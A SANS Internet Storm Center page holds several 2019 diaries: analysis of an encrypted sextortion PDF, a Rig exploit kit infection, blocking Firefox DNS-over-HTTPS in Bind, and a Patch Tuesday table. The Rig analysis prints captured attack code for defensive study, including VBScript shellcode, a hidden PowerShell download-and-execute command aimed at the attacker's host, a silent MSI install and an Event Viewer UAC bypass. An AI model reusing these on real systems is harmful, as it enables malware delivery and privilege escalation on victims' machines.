SANS

SANS Internet Storm Center - Cooperative Cyber Security Monitor
16 September 2019

Encrypted Sextortion PDFs, (Mon, Sep 16th)

We've written about sextortion emails several times. Reader Jason submitted another variant: password protected PDFs with a sextortion message (including QR code for the BTC address).

This gives me the opportunity to discuss some interesting aspects of encrypted PDFs.

PDFs can be encrypted for two main purposes: confidentiality and "Digital Rights Management" (DRM).

When a PDF is encrypted for confidentiality, the user has to provide a password when opening the PDF. This is known as the user password.

Opening a DRM PDF, on the other hand, does not require a password. The user can read the content of the PDF without one, but may be restricted in what can be done with the document: for example, printing or copying text might be disabled. To change these DRM settings, the user needs the owner password.

An unusual property of encrypted PDFs is that their internal structure remains unencrypted. When a PDF file is encrypted (for confidentiality or DRM), not the whole content of the file is encrypted, unlike other file formats such as Word documents. The internal structure, like objects and names, stays in cleartext. What is encrypted are strings and streams.

So, for example, when a PDF document contains a JavaScript script, there will be an object with the name /JavaScript in its dictionary (we exclude stream objects, /ObjStm, in this example), and the script itself will be contained inside a string as a dictionary value (again, in this example).

When this PDF is encrypted, the object with its dictionary keys (like /JavaScript) remains in cleartext, while the string with the script is encrypted.

Let's analyze the sample submitted by Jason with pdfid.py. Here is the result:

First of all, the counter for the name (keyword) /Encrypt is not zero: this tells us that the PDF is encrypted.

Second, the counter for name /ObjStm is zero: this tells us that the PDF does not contain stream objects (/ObjStm). This is important to check when dealing with encrypted PDFs, as stream objects are objects that contain other objects inside their stream. And since streams are encrypted, the objects contained inside a stream object are completely encrypted, and thus totally opaque to us unless we decrypt the document.

All the other names have counters equal to zero. Although this is no guarantee that the PDF is not malicious, it is often a strong indication that the PDF does not contain malicious code, unless you are dealing with something other than common malware (like a targeted attack or a pure binary exploit for a zero-day).

So the next step is to look at the content of this PDF. For this, we need the password (4534 for this sample; it was included in the email message) to open the document. While you can open this document with any PDF reader (best done inside a VM), I'm going to view the content with pdftotext, a free utility that comes with the open source Poppler library.

The user password 4534 is provided via option -upw.

It's clear that this is a sextortion message. It was delivered via an encrypted PDF in an attempt to evade detection.

Encrypted PDFs often pose a problem for anti-spam and anti-virus solutions when they are not able to decrypt the content. My PDF tools have no decryption capabilities: I first use QPDF to decrypt PDFs, then analyze the decrypted file with my tools.
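As an added example (not code from the diary and not one of Didier's tools), here is a small pdfid-style name counter in Python that applies the triage described above: it counts the dictionary names that stay in cleartext, and decides whether the file is encrypted, whether object streams hide further objects, and whether any active-content names are visible. It runs on three constructed stand-ins (not the submitted sample): a sextortion-like encrypted document, the same document with an /OpenAction pointing at a /JavaScript action, and one with an /ObjStm. The "ciphertext" in them is placeholder text and the /Encrypt dictionary is minimal; only the names matter to the scanner.

```python
import re

# Names pdfid.py reports. /Encrypt and /ObjStm drive the encrypted-PDF triage;
# the remaining names point at active content (scripts, actions, attachments).
TRIAGE_NAMES = ("/Encrypt", "/ObjStm", "/JS", "/JavaScript", "/AA",
                "/OpenAction", "/Launch", "/EmbeddedFile", "/RichMedia")
ACTIVE_NAMES = TRIAGE_NAMES[2:]

NAME_RE = re.compile(rb"/([A-Za-z0-9#_.\-]+)")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def count_names(pdf_bytes):
    """Count the tracked names. Names live in object dictionaries, which stay
    in cleartext even when the PDF is encrypted, so no password is needed.
    #xx escapes (e.g. /J#61vaScript) are normalised so that trivial name
    obfuscation does not hide a keyword."""
    counts = {name: 0 for name in TRIAGE_NAMES}
    for match in NAME_RE.finditer(pdf_bytes):
        raw = b"/" + match.group(1)
        name = HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
        name = name.decode("latin-1")
        if name in counts:
            counts[name] += 1
    return counts


def triage(counts):
    """The reasoning from the diary: /Encrypt > 0 means encrypted; /ObjStm > 0
    in an encrypted file means whole objects (and any names inside them) sit
    inside encrypted streams, so a clean name count proves nothing."""
    encrypted = counts["/Encrypt"] > 0
    hidden_objects = encrypted and counts["/ObjStm"] > 0
    active = [n for n in ACTIVE_NAMES if counts[n] > 0]
    if hidden_objects:
        verdict = "opaque: decrypt (qpdf --decrypt) before judging"
    elif active:
        verdict = "suspicious: active-content names visible in cleartext"
    elif encrypted:
        verdict = "no active-content names visible; decrypt to read the text"
    else:
        verdict = "plain PDF, no active-content names"
    return {"encrypted": encrypted, "hidden_objects": hidden_objects,
            "active_names": active, "verdict": verdict}


# Constructed stand-ins, not the submitted sample: stream and string contents
# are placeholders for ciphertext and the /Encrypt dictionary is minimal.
SEXTORTION_LIKE = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj
4 0 obj << /Length 18 >> stream
...ciphertext...
endstream endobj
5 0 obj << /Filter /Standard /V 1 /R 2 /Length 40 /P -3904 /O <0102> /U <0304> >> endobj
trailer << /Root 1 0 R /Encrypt 5 0 R /ID [<01> <01>] >>
%%EOF
"""

# Same file, but the catalog carries an /OpenAction to a /JavaScript action.
# The /JS string is ciphertext; the dictionary names are not.
JS_IN_CLEARTEXT = SEXTORTION_LIKE.replace(
    b"/Pages 2 0 R >>", b"/Pages 2 0 R /OpenAction 6 0 R >>"
) + b"6 0 obj << /S /JavaScript /JS <9d4f7a2c1be0> >> endobj\n"

# Same file plus an object stream: whatever it holds is invisible undecrypted.
WITH_OBJSTM = SEXTORTION_LIKE + (
    b"7 0 obj << /Type /ObjStm /N 3 /First 12 /Length 48 >> stream\n"
    b"...ciphertext...\nendstream endobj\n"
)

if __name__ == "__main__":
    for label, sample in (("sextortion-like", SEXTORTION_LIKE),
                          ("javascript visible", JS_IN_CLEARTEXT),
                          ("object stream", WITH_OBJSTM)):
        result = triage(count_names(sample))
        print(f"{label:20s} {result['verdict']}")
```

On a real file, run pdfid.py first; when /ObjStm or an active-content name shows up, decrypt a copy before going further (qpdf --password=4534 --decrypt encrypted.pdf decrypted.pdf) and continue with pdf-parser.py on the output.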


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
16 September 2019

ISC Stormcast For Monday, September 16th 2019 https://isc.sans.edu/podcastdetail.html?id=6666, (Mon, Sep 16th)

13 September 2019

Rig Exploit Kit Delivering VBScript, (Thu, Sep 12th)

I detected the following suspicious traffic on a corporate network. It was based on multiple infection stages and looked interesting enough to publish a diary about it. This is also a good reminder that, just by surfing the web, you can run into malicious scripts that will try to infect your computer (exploit kits).

It started with a succession of HTTP redirects across multiple domains, all using the .xyz TLD. 

You can see that the servers are hosted behind Cloudflare. All domains are registered via the same registrar (NameCheap). If you visit the first URL manually, it redirects you to Google. I did not find what triggers the redirect: the language (es-ES), the user agent, GeoIP? When I analyzed the websites visited by the victim, I was not 100% confident about which website was infected with the malicious URL (there was also no HTTP Referer), but it looks to be openload[.]co, a file-sharing platform.

The script delivered by the last visited URL is written in VBScript, which only Internet Explorer executes in a web page. That's why a first test checks that it has been delivered to a suitable target (ActiveXObject is only exposed by Internet Explorer):

<script> if (window.ActiveXObject || "ActiveXObject" in window){ ...

The code is not complex to deobfuscate. It is just escaped:

Multiple infection stages are present. You can see a link to a malicious Flash file ("1.swf") (SHA256:498496827afc0aa5960d1cb1d60f7ae7699e0906e3a8c657b6864cff10772df0) with a VT score of 7/55[1]. This is a classic infection method for many exploit kits.

In the VBScript code, we have this very interesting function:

Function GetShellcode()
    ' Eight NUL bytes, then the payload. The trailing ASCII of the second escape
    ' sequence decodes to the command line "mshta http://jeitacave[.]org/hata.hta";
    ' FNB(FNA("")) is appended to it before unescaping.
    TEMPCODE = Unescape("%u0000%u0000%u0000%u0000") & Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%u1de0%u0a2a%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u736d%u7468%u2061%u7468%u7074%u2f3a%u6a2f%u6965%u6174%u6163%u6576%u6f2e%u6772%u682f%u6174%u682e%u6174%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" & FNB(FNA("")))
    ' Pad the buffer to a fixed 0x80000 bytes with 0x41 ("A") characters
    TEMPCODE = TEMPCODE & String((&H80000 - LenB(TEMPCODE)) / 2, Unescape("%u4141"))
    GetShellcode = TEMPCODE
End Function

And how it is loaded and executed:

' Leak the address of a VBScript object, locate vbscript.dll from it, then
' walk import tables to reach kernelbase!VirtualProtect and ntdll!NtContinue
vb_adrr = LeakVBAddr()
vbs_base = GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
msv_base = GetBaseFromImport(vbs_base, "msvcrt.dll")
krb_base = GetBaseFromImport(msv_base, "kernelbase.dll")
ntd_base = GetBaseFromImport(msv_base, "ntdll.dll")
VirtualProtectAddr = GetProcAddr(krb_base, "VirtualProtect")
NtContinueAddr = GetProcAddr(ntd_base, "NtContinue")
' Place the shellcode, wrap it in a CONTEXT for NtContinue, make the region
' executable through VirtualProtect and transfer control
SetMemValue GetShellcode()
ShellcodeAddr = GetMemValue() + 8
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
VirtualProtectAddrFake = GetMemValue() + 69596
SetMemValue ExpandWithVirtualProtect(VirtualProtectAddrFake)
ReuseCLASSl = GetMemValue()
ExecuteShellcode()

A second technique tries to infect the computer via a PowerShell script:

function runmumaa()
    On Error Resume Next
    set shell = createobject("Shell.Application")
    ' Hidden window, execution policy bypassed, second stage fetched and run with IEX
    command = "-nop -windowstyle hidden -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxp://jeitacave[.]org/ps004.jpg')"
    shell.ShellExecute "powershell.exe", command, "", "", 0
end function

The file 'ps004.jpg' is another PowerShell script, encoded as a list of decimal character codes. The prefix reassembles the string "iex" from $ShellId ("Microsoft.PowerShell": index 1 is 'i', index 13 is 'e'), and Set-Item 'Variable:OFS' '' clears the output field separator so that the decoded characters are joined without spaces:

& ( $SheLLID[1]+$shELlid[13]+'X') (" $( seT-iTEm 'VaRIABlE:ofS' '') " + [STrING]( ( 36, 77,117, 116 ,117, 97 ,108 ,69, 120, 99 , 108 ,117, 115 , 105 ,118, 101, 78 ,97 , 109, 101 ,32,61,32,39,71 , 108 ,111, 98 ,97 , 108,92,105,102 ,113 ,71, 112 ,84 , 122 , 100 ,84 ,122, 104 ,77, 74, 83 ,79, 122 , 39, 13 ,10 ,36, 77 , 117 ,116 ,117,97 , 108 , 83, 117 ,99 ,99, 101, 115, 115 ,102 ,117, 108 ,111 ,114 ,110,111,116,32, 61, 32 , 36 ,102,108 ,97, 115 ,101 ,13 , 10 , 36 , 77 , 117 , 116 , 101, 120 ,32, 61 , 32 , 78, 101 ,119 , 45 ,79 ,98 , 106 , 101, 99 , 116,32 ,83 , 121,115 , 116, 101,109,46, 84,104, 114, 101,97 , 100 , 105 , 110 ...

This script creates a mutex ('Global\ifqGpTzdTzhMJSOz') and checks whether it is running with administrator privileges. If yes, it downloads and executes another payload (hxxp://jeitacave[.]org/4U22nOJHFdDmYcgCS.jpg). It's an MSI file (SHA256:33d3568638a62c695823ef00bb0e4d5a717e86870457f6d7ab044eea4a455314) unknown on VT. The installation goes through the Windows Installer API, called from PowerShell via P/Invoke on msi.dll:

public static class msi {
    [DllImport("msi.dll", CharSet=CharSet.Auto)]
    public static extern int MsiInstallProduct(string packagePath, string commandLine);
    [DllImport("msi.dll")]
    public static extern int MsiSetInternalUI(int dwUILevel, IntPtr phWnd);
}
"@
# INSTALLUILEVEL_NONE (2): completely silent installation, straight from the URL
[msi]::MsiSetInternalUI(2,0);
[msi]::MsiInstallProduct("hxxp://jeitacave[.]org/4U22nOJHFdDmYcgCS.jpg","")

Otherwise, it tries to elevate its privileges via the classic Event Viewer UAC bypass[2]: the hijacked mscfile handler runs a command that sets AlwaysInstallElevated in both HKCU and HKLM, so that the MSI package above is installed with SYSTEM privileges:

# Command run by the hijacked handler: enable AlwaysInstallElevated for user and machine
[String]$program = "cmd /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f&reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 00000001 /f"
# Event Viewer (auto-elevated) opens .msc files through this per-user handler
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\Eventvwr.exe" -WindowStyle Hidden
Start-Sleep 3
# Clean up the hijacked handler once the command has run
Remove-Item "HKCU:\Software\Classes\mscfile" -Recurse -Force
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

Once executed, the MSI package is installed via msiexec.exe and performs interesting actions. It disables Windows Defender and changes the host's IPsec policy: it creates a static policy named qianye and a filter list matching inbound traffic to many well-known ports (445, 135 and 139 over TCP and UDP, 21, and a range of high ports). Only the filters appear in the captured commands; the filter action and the rule binding the list to the policy, which decide whether that traffic is permitted or blocked, are not in the excerpt:

"C:\Windows\System32\netsh.exe" ipsec static add policy name=qianye
"C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter1
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=21 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=2222 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=3333 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=4444 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=5555 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=6666 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=7777 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=8443 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=8888 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=9000 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=9999 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=14443 protocol=TCP
"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=14444 protocol=TCP

The last PowerShell script also spawns the C# compiler csc.exe[3]: this is the Add-Type call compiling the P/Invoke wrapper on the fly, a process tree (powershell.exe spawning csc.exe) worth hunting for:

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\yboqji-z.cmdline"

I'm still checking all the scripts and techniques used. Based on my threat feeds, the domain jeitacave[.]org has already been associated with the Rig[4] exploit kit.

[1] https://www.virustotal.com/gui/file/498496827afc0aa5960d1cb1d60f7ae7699e0906e3a8c657b6864cff10772df0/detection
[2] https://pentestlab.blog/2017/05/02/uac-bypass-event-viewer/
[3] https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
[4] https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

13 September 2019

ISC Stormcast For Friday, September 13th 2019 https://isc.sans.edu/podcastdetail.html?id=6664, (Fri, Sep 13th)

12 September 2019

Blocking Firefox DoH with Bind, (Thu, Sep 12th)

For a few days, huge debates have been going on on forums and mailing lists about Mozilla's announcement that it will enable DoH (DNS over HTTPS[1]) by default in Firefox. Since that announcement, Google has also scheduled a move to this technology in upcoming Chrome releases (this was covered in today's podcast episode). My goal here is not to start a new debate. DoH definitely has good points regarding privacy, but the problem is always the way it is implemented. In corporate environments, security teams will certainly try to avoid the use of DoH for logging reasons (DNS logs are a gold mine for incident management and forensics).

Besides the classic browser reconfiguration, Firefox implemented a way to detect whether DoH may be used on a network: it queries a canary domain, "use-application-dns.net". Firefox sends A and AAAA requests for this name through the DNS servers configured in the OS and, if NXDOMAIN is returned, it won't enable DoH.

This morning, a DNS request to resolve this domain returned the following data on my network:

$ dig use-application-dns.net a

; <<>> DiG 9.11.3-1ubuntu1.8-Ubuntu <<>> use-application-dns.net a
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32217
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 5

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;use-application-dns.net.       IN      A

;; ANSWER SECTION:
use-application-dns.net. 3600   IN      A       185.199.110.153
use-application-dns.net. 3600   IN      A       185.199.111.153
use-application-dns.net. 3600   IN      A       185.199.108.153
use-application-dns.net. 3600   IN      A       185.199.109.153

;; AUTHORITY SECTION:
use-application-dns.net. 172800 IN      NS      ns-cloud-b2.googledomains.com.
use-application-dns.net. 172800 IN      NS      ns-cloud-b4.googledomains.com.
use-application-dns.net. 172800 IN      NS      ns-cloud-b1.googledomains.com.
use-application-dns.net. 172800 IN      NS      ns-cloud-b3.googledomains.com.

;; ADDITIONAL SECTION:
ns-cloud-b1.googledomains.com. 291436 IN A      216.239.32.107
ns-cloud-b2.googledomains.com. 291436 IN A      216.239.34.107
ns-cloud-b3.googledomains.com. 291436 IN A      216.239.36.107
ns-cloud-b4.googledomains.com. 291436 IN A      216.239.38.107

;; Query time: 1252 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Thu Sep 12 07:26:47 CEST 2019
;; MSG SIZE  rcvd: 301

Now, let's see how to configure a Bind resolver (a well-known DNS server) to return NXDOMAIN when this domain is queried. The idea is to use RPZ (Response Policy Zones)[2];  I already covered this technique in a previous diary[3]. Here is a simple config for Bind:

Step 1, create a small zone file that contains the domain we don't want to resolve:

$TTL 300
@       SOA  localhost. root.localhost ( 2019091200 2h 30m 30d 1h )
        NS   localhost.
; "CNAME ." is the RPZ action that answers NXDOMAIN for the matched name
use-application-dns.net CNAME .

Step 2, define this zone as a master one:

zone "doh.rpz" {
    type master;
    file "/etc/bind/doh.rpz";
};

Step 3, use the RPZ master zone and apply the policy:

response-policy {
    zone "doh.rpz" policy nxdomain;
};

Note: if more domains are used for the same purpose in the future, we just have to add them to the zone.

Reload Bind and let's test:

$ dig use-application-dns.net a

; <<>> DiG 9.11.3-1ubuntu1.8-Ubuntu <<>> use-application-dns.net a
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 64852
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 728a8c24b984dab8ba5bd2e25d79e8688e337db42aba470d (good)
;; QUESTION SECTION:
;use-application-dns.net.       IN      A

;; ADDITIONAL SECTION:
doh.rpz.                300     IN      SOA     localhost. root.localhost.doh.rpz. 2019091200 7200 1800 2592000 3600

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Thu Sep 12 06:40:40 UTC 2019
;; MSG SIZE  rcvd: 147

Sounds good! Let's confirm with tcpdump:

06:41:52.817392 IP (tos 0x0, ttl 64, id 38080, offset 0, flags [none], proto UDP (17), length 175) localhost.domain > localhost.35517: [bad udp cksum 0xfeae -> 0x2dad!] 52578 NXDomain q: A? use-application-dns.net. 0/0/2 ar: doh.rpz. SOA localhost. root.localhost.doh.rpz. 2019091200 7200 1800 2592000 3600, . OPT UDPsize=4096 (147)

Bonus: by checking your resolver logs for queries to this domain, you'll be able to spot which clients on your network run a Firefox build that is trying to enable DoH. Keep in mind that the canary only governs Firefox's default (automatic) mode: a user who explicitly enabled DoH in the browser settings ignores it, and blocking the DoH resolvers themselves is the only way to stop that client.
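As an added example (not part of the diary), here is Python that does that detection over BIND query-log lines: it parses each line, keeps only lookups for the canary name (compared case-insensitively, and with or without the @0x... client pointer that newer BIND versions print) and reports, per client, whether the A and AAAA pair that Firefox sends was seen. The log lines are constructed in the BIND querylog format with made-up client addresses; the query log itself is switched on with rndc querylog or the queries logging category.

```python
import re
from collections import defaultdict

CANARY = "use-application-dns.net"

# BIND query-log line, with or without the "@0x..." client pointer (BIND 9.11+).
QUERY_LOG_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d+) client (?:@0x[0-9a-f]+ )?"
    r"(?P<client>[0-9a-fA-F.:]+)#\d+ \((?P<qname>[^)]+)\): query: "
    r"(?P<name>\S+) IN (?P<qtype>\S+)")

# Constructed sample log: two Firefox clients doing the canary lookup, one
# unrelated query, one client whose name casing differs, and an unparsable line.
SAMPLE_LOG = """\
12-Sep-2019 07:26:47.101 client @0x7f3c5c0a0e10 192.168.1.23#51234 (use-application-dns.net): query: use-application-dns.net IN A +E(0)K (192.168.1.1)
12-Sep-2019 07:26:47.103 client @0x7f3c5c0a0e10 192.168.1.23#51235 (use-application-dns.net): query: use-application-dns.net IN AAAA +E(0)K (192.168.1.1)
12-Sep-2019 07:27:02.550 client 192.168.1.40#40021 (isc.sans.edu): query: isc.sans.edu IN A + (192.168.1.1)
12-Sep-2019 07:31:15.007 client @0x7f3c5c0a1f40 192.168.1.77#60110 (Use-Application-DNS.net): query: Use-Application-DNS.net IN A +E(0)K (192.168.1.1)
12-Sep-2019 07:31:15.009 client @0x7f3c5c0a1f40 192.168.1.77#60111 (Use-Application-DNS.net): query: Use-Application-DNS.net IN AAAA +E(0)K (192.168.1.1)
garbage line that does not parse
"""


def canary_lookups(log_text):
    """Return {client_ip: {qtype: count}} for queries to the canary domain.
    Names are compared case-insensitively and without a trailing dot, so
    0x20 case randomisation or odd client casing cannot hide a lookup."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = QUERY_LOG_RE.match(line)
        if not m:
            continue
        if m.group("name").rstrip(".").lower() != CANARY:
            continue
        hits[m.group("client")][m.group("qtype")] += 1
    return {ip: dict(types) for ip, types in hits.items()}


def report(hits):
    """One line per client. Firefox sends both A and AAAA for the canary, so a
    lone record type is flagged for a closer look."""
    lines = []
    for ip in sorted(hits):
        types = hits[ip]
        both = "A" in types and "AAAA" in types
        lines.append(f"{ip}: {sum(types.values())} canary lookups ({', '.join(sorted(types))})"
                     + ("" if both else " [A+AAAA pair not seen]"))
    return lines


if __name__ == "__main__":
    for line in report(canary_lookups(SAMPLE_LOG)):
        print(line)
```

With the RPZ in place, every such client received NXDOMAIN and stayed on the corporate resolver; the list is still worth keeping, because those are exactly the machines that will switch to DoH the moment the canary answer changes.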

[1] https://en.wikipedia.org/wiki/DNS_over_HTTPS
[2] https://dnsrpz.info/
[3] https://isc.sans.edu/forums/diary/DNS+Firewalling+with+MISP/24556

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

12 September 2019

ISC Stormcast For Thursday, September 12th 2019 https://isc.sans.edu/podcastdetail.html?id=6662, (Thu, Sep 12th)

11 September 2019

ISC Stormcast For Wednesday, September 11th 2019 https://isc.sans.edu/podcastdetail.html?id=6660, (Wed, Sep 11th)

10 September 2019

Microsoft September 2019 Patch Tuesday, (Tue, Sep 10th)

This month we got patches for 79 vulnerabilities in total. Two of them (CVE-2019-1214 and CVE-2019-1215) are being exploited, and three were previously disclosed (CVE-2019-1253, CVE-2019-1235, and CVE-2019-1294).

The exploited vulnerabilities (CVE-2019-1214 and CVE-2019-1215) affect the Windows Common Log File System (CLFS) driver and ws2ifsl.sys (Winsock), respectively. Both are privilege escalation vulnerabilities and may allow a local attacker to run processes with elevated privileges.

Among the critical vulnerabilities, it's worth mentioning the LNK Remote Code Execution Vulnerability (CVE-2019-1280). It could allow remote code execution if a .LNK file is processed. An attacker may exploit it by presenting the user with a removable drive or a remote share containing a malicious .LNK file associated with a malicious binary. Once the user opens the drive (removable or shared), the malicious binary executes on the user's system. Notice that the user doesn't need to execute the LNK file: it is enough for the malicious .LNK to be parsed by Windows Explorer or any other application that parses .LNK files.

See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

| Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
|---|---|---|---|---|---|---|---|---|
| .NET Core Denial of Service Vulnerability | CVE-2019-1301 | No | No | Less Likely | Less Likely | Important | | |
| .NET Framework Elevation of Privilege Vulnerability | CVE-2019-1142 | No | No | Less Likely | Less Likely | Important | | |
| ASP.NET Core Elevation Of Privilege Vulnerability | CVE-2019-1302 | No | No | Less Likely | Less Likely | Important | | |
| Active Directory Federation Services XSS Vulnerability | CVE-2019-1273 | No | No | Less Likely | Less Likely | Important | 8.2 | 7.4 |
| Azure DevOps and Team Foundation Server Remote Code Execution Vulnerability | CVE-2019-1306 | No | No | Less Likely | Less Likely | Critical | | |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1138 | No | No | - | - | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1217 | No | No | - | - | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1237 | No | No | Less Likely | Less Likely | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1298 | No | No | - | - | Critical | 4.2 | 3.8 |
| Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-1300 | No | No | - | - | Critical | 4.2 | 3.8 |
| Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability | CVE-2019-1232 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| DirectWrite Information Disclosure Vulnerability | CVE-2019-1244 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.9 |
| DirectWrite Information Disclosure Vulnerability | CVE-2019-1245 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.9 |
| DirectWrite Information Disclosure Vulnerability | CVE-2019-1251 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| DirectX Elevation of Privilege Vulnerability | CVE-2019-1284 | No | No | - | - | Important | 7.8 | 7.0 |
| DirectX Information Disclosure Vulnerability | CVE-2019-1216 | No | No | - | - | Important | 5.5 | 5.1 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1240 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1241 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1242 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1243 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1246 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1247 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1248 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1249 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
